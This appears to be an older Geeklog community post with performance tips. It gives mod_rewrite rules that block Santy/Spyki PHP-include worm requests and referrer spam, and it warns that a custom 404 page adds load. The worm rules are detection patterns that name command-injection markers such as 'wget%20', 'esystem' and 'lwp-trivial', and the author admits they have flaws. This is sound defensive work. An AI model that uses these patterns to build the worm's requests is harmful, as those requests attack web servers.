Most tips to speed up a site revolve around optimizing SQL requests or throwing bigger and better hardware at the problem. But if you check your logfiles these days, you'll find a lot of non-sensical requests that can also have some quite dramatic negative impact on your site's performance. Here's a few tips on how to deal with them ...
Santy and other wormsThe outbreak of the original
Santy worm which only attacked phpBB boards was quickly followed by variants (now called Spyki or PhpInclude worm) that target
all PHP scripts out there - including Geeklog.
The Spyki worm tries to exploit a common programming mistake in PHP scripts where the author includes another file based on some parameter passed in the URL. The worm simply tries to exploit this with a brute-force attack on all parameters it can find for a script.
Geeklog itself is not vulnerable to this attack (can't speak for all the existing plugins and other add-ons, but I'm not aware of any problems with them at the moment). But the sheer amount of requests caused by this worm can really slow down a Geeklog site.
So what can we do? The idea is to detect the worm's requests on the server before they're actually executed. I.e. we use the webserver's abilities to catch these requests and make sure the PHP script they're trying to attack is not executed. This safes CPU time (for calling up the PHP interpreter) and DB load (for creating sessions, loading the blocks, etc.).
On geeklog.net, we currently use this in the site's .htaccess file:
Text Formatted Code
# attempts to stop the Santy worm
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
As explained above, this tries to detect patterns typical to the worm's requests and then redirects them to 127.0.0.1. While it is unlikely that the worm will even follow that redirect, it at least saves our webserver the trouble of having to execute the non-sensical request.
This is not the place to discuss and explain how Apache's mod_rewrite works. Check the
Apache manual if you want to learn more about it.
The above rules are derived from similar ones you can find on the web.
This site, for example, has similar rules for mod_security (an Apache 2 module) and also discusses some flaws in the above rules (but they seem to work for us for now ...).
Referrer spamThe same approach can also be used against those stupid referal spams. If you check your logfiles, you'll often find requests allegedly coming from porn or mortgage sites. If you look closely, you'll notice that they only send one request for a story or a forum post, but that it doesn't load any images. So it's not someone actually following a link to your site, it's just a stupid bot trying to draw attention to that site.
Again, if those requests come in a lot, they can increase the server load quite a bit. So we use the same idea as for the worms to catch them before the PHP script is even executed:
Text Formatted Code
# Referrer spam :-(
RewriteCond %{HTTP_REFERER} ^http://.*hosting4u.gb.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://.*4free.gb.com.*$ [NC]
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
The two URLs in this example are two from a batch of sites that are being used in referrer spam at the moment. They are probably gone in a few days or weeks and replaced by others.
Which is the main problem with referrer spam: It's a moving target. So most of the time, I'd say don't bother and ignore them. Use the above only if you see a lot of requests and your server's load is increasing because of them.
404s and home-made problemsSome days ago, I was debugging a script and wondering why it caused SQL requests even after it had collected all the data it needed to display the page. The reason was that it was trying to load an image that wasn't there. And because I had set up Apache to use Geeklog's 404.php for the "404 Not Found" error message, it called up that script every time it couldn't find the image.
In case you're not aware, you can set up your own 404 page in a .htaccess like this:
Text Formatted Code
ErrorDocument 404 /404.php
So now every time a file is not found, the error message comes nicely wrapped in Geeklog.
However, that also means that every 404 causes the execution of a PHP script and requests to the database. So if you have a lot of 404s, you're creating a lot of load for both your server and your database. Check your logfiles regularily and try to fix those 404s.
Hope these tips help someone ...
bye, Dirk